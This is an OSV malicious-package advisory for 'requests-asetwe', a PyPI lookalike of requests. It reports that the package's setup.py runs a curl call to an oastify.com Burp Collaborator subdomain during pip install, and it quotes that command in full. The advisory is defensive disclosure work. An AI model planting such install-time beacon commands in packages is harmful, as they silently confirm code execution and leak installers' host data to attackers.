requests-asetwe@2.34.2
Vulnerability report · Last retrieved from osv.dev September 18, 2026 at 2:37 AM UTC
OSV ID
MAL-2026-16269
Ecosystem
pypi
Summary
setup.py of requests-asetwe unconditionally executes os.system('curl -s https://w5223hr2yr968bhwql8bv5n8ozuqih66.oastify.com') during pip install. The destination is a Burp Collaborator (oastify.com) subdomain — an out-of-band interaction service used to confirm code execution and collect the victim's IP/DNS metadata on the attacker's collaborator instance. The package name is a lookalike of the widely-used requests package, and the shipped setup.py has no legitimate reason to contact an anonymous oastify subdomain at install time. Installing the package causes the installer's host to beacon to attacker-controlled infrastructure automatically.
Source: amazon-inspector (c0316bf059751a9ece4fb034e225276529692338dc671ad9929e16faf8c843d5)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.